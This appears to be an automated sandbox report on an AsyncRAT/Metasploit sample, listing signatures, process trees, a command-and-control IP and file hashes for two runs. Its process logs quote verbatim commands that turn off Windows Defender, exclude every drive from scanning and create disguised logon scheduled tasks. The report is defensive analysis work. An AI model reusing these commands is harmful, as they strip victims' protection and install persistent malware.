memory/508-1177-0x00007FF621B20000-0x00007FF621C0B000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-06-19 22:13
Reported
2024-06-19 22:16
Platform
win7-20240611-en
Max time kernel
143s
Max time network
149s
Command Line
Signatures
AsyncRat
MetaSploit
Modifies Windows Defender Real-time Protection settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | C:\Windows\system32\reg.exe | N/A |
Async RAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\system32\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\system32\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\system32\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\system32\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\system32\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\system32\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\system32\rundll32.exe | N/A |
Command and Scripting Interpreter: PowerShell
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\LOlC.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Runtime Broker.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\LOIC.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\COM Surrogate.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Windows Defender\Anti Malware Service.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\LOIC2.exe | N/A |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
Enumerates physical storage devices
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\LOIC.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\LOIC.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\LOIC2.exe
"C:\Users\Admin\AppData\Local\Temp\LOIC2.exe"
C:\Users\Admin\AppData\Local\LOlC.exe
"C:\Users\Admin\AppData\Local\LOlC.exe"
C:\Users\Admin\AppData\Local\Runtime Broker.exe
"C:\Users\Admin\AppData\Local\Runtime Broker.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c mkdir "C:\Users\Admin\AppData\Local\Windows Defender"
C:\Users\Admin\AppData\Local\LOIC.exe
"C:\Users\Admin\AppData\Local\LOIC.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c COPY "C:\Users\Admin\AppData\Local\LOlC.exe" "C:\Users\Admin\AppData\Local\Windows Defender\Windows Defender.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c SCHTASKS /CREATE /SC ONLOGON /TN "Windows Defender\Defender Scan" /TR "C:\Users\Admin\AppData\Local\Windows Defender\Windows Defender.exe" /F /RU "SYSTEM"
C:\Windows\system32\schtasks.exe
SCHTASKS /CREATE /SC ONLOGON /TN "Windows Defender\Defender Scan" /TR "C:\Users\Admin\AppData\Local\Windows Defender\Windows Defender.exe" /F /RU "SYSTEM"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg Add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 01 -f
C:\Windows\system32\reg.exe
reg Add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 01 -f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg Add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 -f
C:\Windows\system32\reg.exe
reg Add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 -f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "A:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "A:\\" -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "B:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "B:\\" -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "C:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "C:\\" -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "D:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "D:\\" -Force
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "COM Surrogate" /tr '"C:\Users\Admin\AppData\Roaming\COM Surrogate.exe"' & exit
C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmp1584.tmp.bat""
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "COM Surrogate" /tr '"C:\Users\Admin\AppData\Roaming\COM Surrogate.exe"'
C:\Windows\system32\timeout.exe
timeout 3
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "E:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "E:\\" -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "F:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "F:\\" -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "G:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "G:\\" -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "H:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "H:\\" -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "I:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "I:\\" -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "J:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "J:\\" -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "K:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "K:\\" -Force
C:\Users\Admin\AppData\Roaming\COM Surrogate.exe
"C:\Users\Admin\AppData\Roaming\COM Surrogate.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "L:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "L:\\" -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "M:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "M:\\" -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "N:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "N:\\" -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "O:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "O:\\" -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "P:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "P:\\" -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "Q:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "Q:\\" -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "R:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "R:\\" -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "S:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "S:\\" -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "T:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "T:\\" -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "U:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "U:\\" -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "V:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "V:\\" -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "W:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "W:\\" -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "X:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "X:\\" -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "Y:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "Y:\\" -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "Z:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "Z:\\" -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Windows Defender\Anti Malware Service.exe"
C:\Users\Admin\AppData\Local\Windows Defender\Anti Malware Service.exe
"C:\Users\Admin\AppData\Local\Windows Defender\Anti Malware Service.exe"
C:\Windows\system32\rundll32.exe
rundll32
Network
| Country | Destination | Domain | Proto |
| DE | 193.161.193.99:21265 | | tcp |
| DE | 193.161.193.99:52695 | | tcp |
| DE | 193.161.193.99:52695 | | tcp |
| DE | 193.161.193.99:52695 | | tcp |
| DE | 193.161.193.99:52695 | | tcp |
| DE | 193.161.193.99:52695 | | tcp |
| DE | 193.161.193.99:52695 | | tcp |
| DE | 193.161.193.99:21265 | | tcp |
| DE | 193.161.193.99:52695 | | tcp |
| DE | 193.161.193.99:52695 | | tcp |
Files
memory/3056-0-0x000007FEF5653000-0x000007FEF5654000-memory.dmp
memory/3056-1-0x0000000000150000-0x000000000060E000-memory.dmp
\Users\Admin\AppData\Local\LOlC.exe
| MD5 | e6b7d05c7a4369dd9112959795bb3521 |
| SHA1 | 80c60595def3cbb2d126e3c86c9a1b92572b55b7 |
| SHA256 | 10eb620d956a63295cd933a3bad5769b1f8b0eec8b3748569467c82fb61e295c |
| SHA512 | baa982104c839f9f0893dc2940b418fc64fcc9e964a2791c176f7e7795ee7732429287d84f5d37bea15882a6462eaa7f7996bf283a27a0718ee96054a396a806 |
C:\Users\Admin\AppData\Local\Runtime Broker.exe
| MD5 | 9c3ad681c33d3fb6934102a35cb7a2ad |
| SHA1 | d3630943b6af7b956eb459fc2e8f5137f2f5f8a1 |
| SHA256 | 9625d7f8c8ddded4818a03ec7912c0df6ce464a95eb055b01a15fe3aa373305b |
| SHA512 | ea310b840455b8279c72ccb8e45f27b6ec861baf66d223b584d790bdca6426b54729eb7c80163c8e6ce1e88044088c1167109be0cb9418935d70ef42a6bbd466 |
memory/2912-14-0x0000000000F60000-0x0000000000F76000-memory.dmp
C:\Users\Admin\AppData\Local\LOIC.exe
| MD5 | e6fa3028cd03318496852718143d256f |
| SHA1 | 4c85973d612cd1955163c244c9c334d3a0c507cb |
| SHA256 | f60a52512773b52def9ba9ce8aad61144d2cf351f6bc04d1c5a13abef8f3b89b |
| SHA512 | 29089eccd1e670570fecafdd682f0ec13bc55fb17cdc0938ff4c6fd32c55c1919e26fad5b3ffed78217a94a9e8aba768cdf092ffc85f6ab19fbede0dc0fae0bb |
memory/2344-18-0x00000000000F0000-0x0000000000118000-memory.dmp
memory/2912-22-0x000007FEF5650000-0x000007FEF603C000-memory.dmp
memory/2852-27-0x000000001B5C0000-0x000000001B8A2000-memory.dmp
memory/2852-28-0x00000000027E0000-0x00000000027E8000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | 270796220a5fa3608f1f2f8aced4deb2 |
| SHA1 | a4f6aea3b0578670f542a46147ae31b764ae0bbb |
| SHA256 | 5799972ecce88fa3d251b970c5f1379fde540323c0097bac9466ae3ca47993b7 |
| SHA512 | 32bb1776b58a1063210d8cd797449978f4253ffd285e31afc10d56f369cf9cd7c659ba6276d1f19765d0b95600c0d8b19a7e27c771c40ee8786e946e9743eb37 |
memory/2560-35-0x00000000020F0000-0x00000000020F8000-memory.dmp
memory/2560-34-0x000000001B670000-0x000000001B952000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\tmp1584.tmp.bat
| MD5 | 90ff56b4b49a19829c55be4740d3d12f |
| SHA1 | f6680d7c2503c0601216a8f25b293748d50cbc70 |
| SHA256 | 87570ea322dea37a6701b524262a55f734114832f65278e44939aae2441a8acc |
| SHA512 | 916ee231cd3168b9d4e55cfecbd9cb10c4d9a5b0b99b194b0051dd3c0ca99841f455fb9ab55d05d4ccdb8677fdc86a9a977b72f2c237e511f6536f1313f810e7 |
memory/2912-54-0x000007FEF5650000-0x000007FEF603C000-memory.dmp
memory/908-94-0x00000000010C0000-0x00000000010D6000-memory.dmp
\??\PIPE\srvsvc
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Temp\Cab346B.tmp
| MD5 | 49aebf8cbd62d92ac215b2923fb1b9f5 |
| SHA1 | 1723be06719828dda65ad804298d0431f6aff976 |
| SHA256 | b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f |
| SHA512 | bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b |
memory/3036-172-0x000000013F8D0000-0x000000013FD57000-memory.dmp
C:\Users\Admin\AppData\Local\Windows Defender\Anti Malware Service.exe
| MD5 | 1837aea22a774bde2cd2eca02b5995a0 |
| SHA1 | c00b11f612716a5b9f282264538ddc2e041d8981 |
| SHA256 | 3263283f59723e5487b128439d495da10b06f84a84793da717a35e0dd7e3b905 |
| SHA512 | 9f479883cae36152dd2d2bf55e35d2ab05783e214479d12b957d316e4d3c16b63d9dfaf11f3752f9831c182f7c4b06261849042999bac4544fed4011c9fad67b |
memory/1540-193-0x0000000000060000-0x0000000000061000-memory.dmp
memory/1540-195-0x0000000000060000-0x0000000000061000-memory.dmp
memory/688-197-0x000000013F450000-0x000000013F53B000-memory.dmp
memory/908-217-0x0000000000560000-0x0000000000594000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Tar37A9.tmp
| MD5 | 4ea6026cf93ec6338144661bf1202cd1 |
| SHA1 | a1dec9044f750ad887935a01430bf49322fbdcb7 |
| SHA256 | 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8 |
| SHA512 | 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b |
Analysis: behavioral3
Detonation Overview
Submitted
2024-06-19 22:13
Reported
2024-06-19 22:16
Platform
win10v2004-20240508-en
Max time kernel
149s
Max time network
149s
Command Line
Signatures
AsyncRat
MetaSploit
Modifies Windows Defender Real-time Protection settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | C:\Windows\system32\reg.exe | N/A |
Async RAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\rundll32.exe | N/A |
Command and Scripting Interpreter: PowerShell
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\LOIC2.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Runtime Broker.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\LOlC.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Runtime Broker.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\LOIC.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\COM Surrogate.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Windows Defender\Anti Malware Service.exe | N/A |
Enumerates physical storage devices
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\LOIC.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\LOIC.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\LOIC2.exe
"C:\Users\Admin\AppData\Local\Temp\LOIC2.exe"
C:\Users\Admin\AppData\Local\LOlC.exe
"C:\Users\Admin\AppData\Local\LOlC.exe"
C:\Users\Admin\AppData\Local\Runtime Broker.exe
"C:\Users\Admin\AppData\Local\Runtime Broker.exe"
C:\Users\Admin\AppData\Local\LOIC.exe
"C:\Users\Admin\AppData\Local\LOIC.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c mkdir "C:\Users\Admin\AppData\Local\Windows Defender"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c COPY "C:\Users\Admin\AppData\Local\LOlC.exe" "C:\Users\Admin\AppData\Local\Windows Defender\Windows Defender.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c SCHTASKS /CREATE /SC ONLOGON /TN "Windows Defender\Defender Scan" /TR "C:\Users\Admin\AppData\Local\Windows Defender\Windows Defender.exe" /F /RU "SYSTEM"
C:\Windows\system32\schtasks.exe
SCHTASKS /CREATE /SC ONLOGON /TN "Windows Defender\Defender Scan" /TR "C:\Users\Admin\AppData\Local\Windows Defender\Windows Defender.exe" /F /RU "SYSTEM"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg Add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 01 -f
C:\Windows\system32\reg.exe
reg Add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 01 -f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg Add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 -f
C:\Windows\system32\reg.exe
reg Add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 -f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "A:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "A:\\" -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "B:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "B:\\" -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "C:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "C:\\" -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "D:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "D:\\" -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "E:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "E:\\" -Force
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "COM Surrogate" /tr '"C:\Users\Admin\AppData\Roaming\COM Surrogate.exe"' & exit
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp5FC3.tmp.bat""
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "F:\\" -Force
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "COM Surrogate" /tr '"C:\Users\Admin\AppData\Roaming\COM Surrogate.exe"'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "F:\\" -Force
C:\Windows\system32\timeout.exe
timeout 3
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "G:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "G:\\" -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "H:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "H:\\" -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "I:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "I:\\" -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "J:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "J:\\" -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "K:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "K:\\" -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "L:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "L:\\" -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "M:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "M:\\" -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "N:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "N:\\" -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "O:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "O:\\" -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "P:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "P:\\" -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "Q:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "Q:\\" -Force
C:\Users\Admin\AppData\Roaming\COM Surrogate.exe
"C:\Users\Admin\AppData\Roaming\COM Surrogate.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "R:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "R:\\" -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "S:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "S:\\" -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "T:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "T:\\" -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "U:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "U:\\" -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "V:\\" -Force
